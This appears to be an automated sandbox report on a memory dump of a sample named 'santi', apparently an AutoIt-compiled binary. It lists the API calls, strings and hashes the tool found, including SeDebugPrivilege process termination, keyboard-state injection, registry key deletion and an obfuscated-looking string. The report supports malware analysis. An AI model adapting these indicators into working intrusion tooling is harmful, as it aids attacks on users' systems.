                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                • String ID: SeDebugPrivilege
                                                                • API String ID: 2533919879-2896544425
                                                                • Opcode ID: 7c1061813b2cbabf99bccda95f8270dfbe67359ca9a11ef3f6815f3162c0a711
                                                                • Instruction ID: 4f9c019c4961611e656cf6de90ef54976e9aae9485f83eb6a47eb73a3e5fbc2b
                                                                • Opcode Fuzzy Hash: 7c1061813b2cbabf99bccda95f8270dfbe67359ca9a11ef3f6815f3162c0a711
                                                                • Instruction Fuzzy Hash: 5941CF71700600AFDB16EF54C895FAEB7E5AF44700F068059FA069F2C2DBB4A944CF91
                                                                APIs
                                                                • LoadIconW.USER32(00000000,00007F03), ref: 003258B8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: IconLoad
                                                                • String ID: blank$info$question$stop$warning
                                                                • API String ID: 2457776203-404129466
                                                                • Opcode ID: 187ec6a476d67cd98fee02d6d84eb5f7939ff8bdd756f8b649c98532c2cdd0f7
                                                                • Instruction ID: e35124c6f0893f4fa7e21f304fae09b70665292cc5379664d3978c919e52c9d1
                                                                • Opcode Fuzzy Hash: 187ec6a476d67cd98fee02d6d84eb5f7939ff8bdd756f8b649c98532c2cdd0f7
                                                                • Instruction Fuzzy Hash: 6A110D7670E757BAEB075B54BC92DAA379C9F16710F20003AF510F52C1E7F0AB004265
                                                                APIs
                                                                • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0032A806
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ArraySafeVartype
                                                                • String ID:
                                                                • API String ID: 1725837607-0
                                                                • Opcode ID: d38e1d9cabfccfcd01c54ce5877b2d6163ffd18363536c88fbb3328fa039b900
                                                                • Instruction ID: d6833ba69bf25ad8dc44e3e9ccabcc5a6979af86c95a13af5af5a8dd4fa1d9fd
                                                                • Opcode Fuzzy Hash: d38e1d9cabfccfcd01c54ce5877b2d6163ffd18363536c88fbb3328fa039b900
                                                                • Instruction Fuzzy Hash: 9EC16D75A0462ADFDB06CF98E581BAEBBF4FF08315F20846AE605E7241D734A941CF91
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00326B63
                                                                • LoadStringW.USER32(00000000), ref: 00326B6A
                                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00326B80
                                                                • LoadStringW.USER32(00000000), ref: 00326B87
                                                                • _wprintf.LIBCMT ref: 00326BAD
                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00326BCB
                                                                Strings
                                                                • %s (%d) : ==> %s: %s %s, xrefs: 00326BA8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: HandleLoadModuleString$Message_wprintf
                                                                • String ID: %s (%d) : ==> %s: %s %s
                                                                • API String ID: 3648134473-3128320259
                                                                • Opcode ID: bfaaf4eb5b1ef27943e78adffaeb1107152e5e6e80d805089c30dbfa192ec5d9
                                                                • Instruction ID: a598f970d256ebf1ca0ba5b6a85fbea967ecf7cbba5133186ebc1ce3f6ad458a
                                                                • Opcode Fuzzy Hash: bfaaf4eb5b1ef27943e78adffaeb1107152e5e6e80d805089c30dbfa192ec5d9
                                                                • Instruction Fuzzy Hash: FB0186F69002187FEB12A7A0DD89EF7376CDB08304F008491F746E2041EAB49E848F74
                                                                APIs
                                                                  • Part of subcall function 00343C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00342BB5,?,?), ref: 00343C1D
                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00342BF6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: BuffCharConnectRegistryUpper
                                                                • String ID:
                                                                • API String ID: 2595220575-0
                                                                • Opcode ID: 0d6c60793127cbce1257168a8d04b00f92166e4855e83175e7214c877c784918
                                                                • Instruction ID: 683e105fa288791366df428d88a990dcb722ce034ff0afe594d8071dfe5d5cd7
                                                                • Opcode Fuzzy Hash: 0d6c60793127cbce1257168a8d04b00f92166e4855e83175e7214c877c784918
                                                                • Instruction Fuzzy Hash: 55919B31604200AFCB12EF55C891B6EB7E5FF89310F45885DF996AB2A2DB70E915CF42
                                                                APIs
                                                                • select.WSOCK32 ref: 00339691
                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0033969E
                                                                • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 003396C8
                                                                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 003396E9
                                                                • WSAGetLastError.WSOCK32(00000000), ref: 003396F8
                                                                • htons.WSOCK32(?,?,?,00000000,?), ref: 003397AA
                                                                • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0037DC00), ref: 00339765
                                                                  • Part of subcall function 0031D2FF: _strlen.LIBCMT ref: 0031D309
                                                                • _strlen.LIBCMT ref: 00339800
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                Similarity
                                                                • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                                • String ID:
                                                                • API String ID: 3480843537-0
                                                                APIs
                                                                • __mtinitlocknum.LIBCMT ref: 0030A991
                                                                  • Part of subcall function 00307D7C: __FF_MSGBANNER.LIBCMT ref: 00307D91
                                                                  • Part of subcall function 00307D7C: __NMSG_WRITE.LIBCMT ref: 00307D98
                                                                  • Part of subcall function 00307D7C: __malloc_crt.LIBCMT ref: 00307DB8
                                                                • __lock.LIBCMT ref: 0030A9A4
                                                                • __lock.LIBCMT ref: 0030A9F0
                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00396DE0,00000018,00315E7B,?,00000000,00000109), ref: 0030AA0C
                                                                • EnterCriticalSection.KERNEL32(8000000C,00396DE0,00000018,00315E7B,?,00000000,00000109), ref: 0030AA29
                                                                • LeaveCriticalSection.KERNEL32(8000000C), ref: 0030AA39
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                Similarity
                                                                • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                • String ID:
                                                                • API String ID: 1422805418-0
                                                                APIs
                                                                • DeleteObject.GDI32(00000000), ref: 00348EE4
                                                                • GetDC.USER32(00000000), ref: 00348EEC
                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00348EF7
                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00348F03
                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00348F3F
                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00348F50
                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0034BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00348F8A
                                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00348FAA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                Similarity
                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                • String ID:
                                                                • API String ID: 3864802216-0
                                                                APIs
                                                                  • Part of subcall function 002FB34E: GetWindowLongW.USER32(?,000000EB), ref: 002FB35F
                                                                • GetSystemMetrics.USER32(0000000F), ref: 0035016D
                                                                • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0035038D
                                                                • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 003503AB
                                                                • InvalidateRect.USER32(?,00000000,00000001,?), ref: 003503D6
                                                                • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 003503FF
                                                                • ShowWindow.USER32(00000003,00000000), ref: 00350421
                                                                • DefDlgProcW.USER32(?,00000005,?,?), ref: 00350440
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                Similarity
                                                                • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                • String ID:
                                                                • API String ID: 3356174886-0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                APIs
                                                                • _memset.LIBCMT ref: 0034225A
                                                                • _memset.LIBCMT ref: 00342323
                                                                • ShellExecuteExW.SHELL32(?), ref: 00342368
                                                                  • Part of subcall function 002E936C: __swprintf.LIBCMT ref: 002E93AB
                                                                  • Part of subcall function 002E936C: __itow.LIBCMT ref: 002E93DF
                                                                  • Part of subcall function 002FC6F4: _wcscpy.LIBCMT ref: 002FC717
                                                                • CloseHandle.KERNEL32(00000000), ref: 0034242F
                                                                • FreeLibrary.KERNEL32(00000000), ref: 0034243E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                Similarity
                                                                • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                • String ID: @
                                                                • API String ID: 4082843840-2766056989
                                                                APIs
                                                                • GetParent.USER32(?), ref: 00323DE7
                                                                • GetKeyboardState.USER32(?), ref: 00323DFC
                                                                • SetKeyboardState.USER32(?), ref: 00323E5D
                                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 00323E8B
                                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 00323EAA
                                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00323EF0
                                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00323F13
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                Similarity
                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                • String ID:
                                                                • API String ID: 87235514-0
                                                                APIs
                                                                • GetParent.USER32(00000000), ref: 00323C02
                                                                • GetKeyboardState.USER32(?), ref: 00323C17
                                                                • SetKeyboardState.USER32(?), ref: 00323C78
                                                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00323CA4
                                                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00323CC1
                                                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00323D05
                                                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00323D26
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                Similarity
                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                • String ID:
                                                                • API String ID: 87235514-0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                Similarity
                                                                • API ID: _wcsncpy$LocalTime
                                                                • String ID:
                                                                • API String ID: 2945705084-0
                                                                APIs
                                                                • GetCursorPos.USER32(000000FF), ref: 002FB64F
                                                                • ScreenToClient.USER32(00000000,000000FF), ref: 002FB66C
                                                                • GetAsyncKeyState.USER32(00000001), ref: 002FB691
                                                                • GetAsyncKeyState.USER32(00000002), ref: 002FB69F
                                                                Strings
                                                                • qw601qqw601qqw601qqw661qqw6a1qqw601qqw631qqw661qqw6a1qqw601qqw601qqw661qqw6a1qqw601qqw671qqw661qqw681qqw601qqw601qqw601qqw601qqw60, xrefs: 0035DFDC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                Similarity
                                                                • API ID: AsyncState$ClientCursorScreen
                                                                • String ID: qw601qqw601qqw601qqw661qqw6a1qqw601qqw631qqw661qqw6a1qqw601qqw601qqw661qqw6a1qqw601qqw671qqw661qqw681qqw601qqw601qqw601qqw601qqw60
                                                                • API String ID: 4210589936-3317250924
                                                                APIs
                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00343DA1
                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00343DCB
                                                                • FreeLibrary.KERNEL32(00000000), ref: 00343E80
                                                                  • Part of subcall function 00343D72: RegCloseKey.ADVAPI32(?), ref: 00343DE8
                                                                  • Part of subcall function 00343D72: FreeLibrary.KERNEL32(?), ref: 00343E3A
                                                                  • Part of subcall function 00343D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00343E5D
                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00343E25
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                • String ID:
                                                                • API String ID: 395352322-0
                                                                • Opcode ID: 28a8585f7d0b19cf118a9cb3de7c4382030755ed6d78da9a08494bd8e46b7710
                                                                • Instruction ID: 9fd6ef1d4e6c51d3042efaec52c61391be831915e0e2a9b383f2cf52a500bca8
                                                                • Opcode Fuzzy Hash: 28a8585f7d0b19cf118a9cb3de7c4382030755ed6d78da9a08494bd8e46b7710
                                                                • Instruction Fuzzy Hash: 1231DBB2D01109BFDB169B94DC85AFFB7BCEF08300F004569E512A7150D674AF859AA0
                                                                APIs
                                                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00348FE7
                                                                • GetWindowLongW.USER32(00DED440,000000F0), ref: 0034901A
                                                                • GetWindowLongW.USER32(00DED440,000000F0), ref: 0034904F
                                                                • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00349081
                                                                • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 003490AB
                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 003490BC
                                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 003490D6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: LongWindow$MessageSend
                                                                • String ID:
                                                                • API String ID: 2178440468-0
                                                                • Opcode ID: 6c50f521246ba5d592b60a3a2fb15f73158750e5baef51a52beaa8b9ab451075
                                                                • Instruction ID: 8df8d5821e93c375899935f0d1e053db713c83b765010f683efdd2358315c480
                                                                • Opcode Fuzzy Hash: 6c50f521246ba5d592b60a3a2fb15f73158750e5baef51a52beaa8b9ab451075
                                                                • Instruction Fuzzy Hash: 98310234600215AFDB228F58DC88F6677E9FB4A754F1541A6FA198F2B1CBB2BC40DB41
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003208F2
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00320918
                                                                • SysAllocString.OLEAUT32(00000000), ref: 0032091B
                                                                • SysAllocString.OLEAUT32(?), ref: 00320939
                                                                • SysFreeString.OLEAUT32(?), ref: 00320942
                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 00320967
                                                                • SysAllocString.OLEAUT32(?), ref: 00320975
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                • String ID:
                                                                • API String ID: 3761583154-0
                                                                • Opcode ID: 261ff397803bcfc170d5bdd5992af8d7f70fd5f896a9d53c69bb83da0b81102d
                                                                • Instruction ID: 0378f9a6625887abfe4aa9af6d50d10107470cda2f8cefe119b8d382ce4e96f7
                                                                • Opcode Fuzzy Hash: 261ff397803bcfc170d5bdd5992af8d7f70fd5f896a9d53c69bb83da0b81102d
                                                                • Instruction Fuzzy Hash: 0321A976601219AF9B159F78DC88DBB73ACEF09360B018125F915DB162DB70EC45CB64
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: __wcsnicmp
                                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                • API String ID: 1038674560-2734436370
                                                                • Opcode ID: d792e057eb8e7aafa8904e9892301b3290f31381c45b409ed13139367701c484
                                                                • Instruction ID: c8378f040eb4c655a02da1f49d224d2fd29d5f98c8c87e2959f30ec0173134c4
                                                                • Opcode Fuzzy Hash: d792e057eb8e7aafa8904e9892301b3290f31381c45b409ed13139367701c484
                                                                • Instruction Fuzzy Hash: D3213A3110413577D333BA25AD12EB7B39CEF65300F61C42AF5459B181E7559942C2A5
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003209CB
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003209F1
                                                                • SysAllocString.OLEAUT32(00000000), ref: 003209F4
                                                                • SysAllocString.OLEAUT32 ref: 00320A15
                                                                • SysFreeString.OLEAUT32 ref: 00320A1E
                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 00320A38
                                                                • SysAllocString.OLEAUT32(?), ref: 00320A46
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                • String ID:
                                                                • API String ID: 3761583154-0
                                                                • Opcode ID: f619b46129f7a8568ffb4680137492eac61f8c8da52e3e8050db91225637de7a
                                                                • Instruction ID: e111351ff1905a85fba06df68c54859fd2435986367b1dd0b448b0082aad823d
                                                                • Opcode Fuzzy Hash: f619b46129f7a8568ffb4680137492eac61f8c8da52e3e8050db91225637de7a
                                                                • Instruction Fuzzy Hash: 50217775600214AFDB159FA8DC88D6B77ECEF08360B418125F909CB261DA70EC458B64
                                                                APIs
                                                                  • Part of subcall function 002FD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002FD1BA
                                                                  • Part of subcall function 002FD17C: GetStockObject.GDI32(00000011), ref: 002FD1CE
                                                                  • Part of subcall function 002FD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 002FD1D8
                                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0034A32D
                                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0034A33A
                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0034A345
                                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0034A354
                                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0034A360
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$CreateObjectStockWindow
                                                                • String ID: Msctls_Progress32
                                                                • API String ID: 1025951953-3636473452
                                                                • Opcode ID: 1ed7efbb35a0bbde196d0586109dc0977b17d804ac064a61b1c0549c853e3467
                                                                • Instruction ID: 33e3c62cd052f465b186560234aca9b94844a16af970611a6e763bf9377b628a
                                                                • Opcode Fuzzy Hash: 1ed7efbb35a0bbde196d0586109dc0977b17d804ac064a61b1c0549c853e3467
                                                                • Instruction Fuzzy Hash: F1118EB5150219BEEF129F64CC85EEB7F6DFF09798F014114FA08A60A0C672AC21DBA4
                                                                APIs
                                                                • GetClientRect.USER32(?,?), ref: 002FCCF6
                                                                • GetWindowRect.USER32(?,?), ref: 002FCD37
                                                                • ScreenToClient.USER32(?,?), ref: 002FCD5F
                                                                • GetClientRect.USER32(?,?), ref: 002FCE8C
                                                                • GetWindowRect.USER32(?,?), ref: 002FCEA5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Rect$Client$Window$Screen
                                                                • String ID:
                                                                • API String ID: 1296646539-0
                                                                • Opcode ID: 90161c03d051f36f08c9fc058b80954ce7a70a2d3ce016d5bd77668d97fd420a
                                                                • Instruction ID: 507f929dc8774272c08229c4a227c7b1bf48ae1bbaca5e46c3c0bcd37a8c7f54
                                                                • Opcode Fuzzy Hash: 90161c03d051f36f08c9fc058b80954ce7a70a2d3ce016d5bd77668d97fd420a
                                                                • Instruction Fuzzy Hash: 69B14B79A1024EDBDF14CFA8C5807EDBBB1FF08340F248569ED599B250DB70AA64CB54
                                                                APIs
                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00341C18
                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00341C26
                                                                • __wsplitpath.LIBCMT ref: 00341C54
                                                                  • Part of subcall function 00301DFC: __wsplitpath_helper.LIBCMT ref: 00301E3C
